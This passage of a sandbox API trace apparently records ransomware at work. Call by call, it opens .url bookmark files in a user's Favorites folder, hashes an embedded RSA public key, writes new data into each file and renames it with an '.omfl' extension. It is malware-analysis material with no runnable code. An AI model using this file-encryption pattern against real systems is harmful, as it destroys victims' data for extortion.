hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17520 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17508 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174d8 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0132.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174c0 | out: hHeap=0x4970000) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dbdd8 | out: hHeap=0x4970000) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.854] WriteFile (in: hFile=0x610, lpBuffer=0xdd14728*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd14728*, lpNumberOfBytesWritten=0xe00fb14*=0x80, lpOverlapped=0x0) returned 1 [0132.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0132.855] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.855] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0132.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0132.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0132.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0x757b548 [0132.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0132.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0132.855] WriteFile (in: hFile=0x610, lpBuffer=0x757b548*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x757b548*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0132.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b548 | out: hHeap=0x4970000) returned 1 [0132.856] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.856] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.856] CloseHandle (hObject=0x610) returned 1 [0132.860] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0c20 [0132.860] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8a0) returned 0x74fb288 [0132.860] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf0c20 | out: hHeap=0x4970000) returned 1 [0132.861] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.omfl")) returned 1 [0132.861] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.861] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.861] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.863] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0132.863] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0132.863] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e880 [0132.863] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa6) returned 0x74bf9a0 [0132.863] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2e880 | out: hHeap=0x4970000) returned 1 [0132.863] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned=".url" [0132.863] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.640] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0133.640] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.643] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.643] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0133.644] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0133.644] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.644] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.644] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x85, lpOverlapped=0x0) returned 1 [0133.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0133.644] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0133.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0133.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0133.644] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.645] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.645] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.645] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.645] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0133.646] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.646] GetLastError () returned 0x0 [0133.646] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.646] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.646] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.646] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.646] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0133.646] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.646] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0133.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14728 [0133.646] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0133.646] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0133.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0133.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0133.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0133.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0133.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbdd8 [0133.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174c0 [0133.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbe20 [0133.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174d8 [0133.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17508 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17520 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0133.647] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0133.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17508 | out: hHeap=0x4970000) returned 1 [0133.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17520 | out: hHeap=0x4970000) returned 1 [0133.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0133.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0133.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17520 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17508 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdbc8 [0133.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0133.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0133.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17520 | out: hHeap=0x4970000) returned 1 [0133.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0133.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17508 | out: hHeap=0x4970000) returned 1 [0133.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0133.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0133.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0133.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0133.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0133.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0133.648] GetCurrentThreadId () returned 0x618 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579f80 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0133.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0133.648] GetCurrentThreadId () returned 0x618 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0133.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0133.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0133.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0133.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0133.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0133.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0133.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17508 [0133.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0133.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17520 [0133.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0133.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174f0 [0133.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0133.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0133.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0133.650] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.omfl")) returned 1 [0133.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.651] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.653] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.653] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0133.653] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned=".url" [0133.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.677] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0133.677] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.680] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 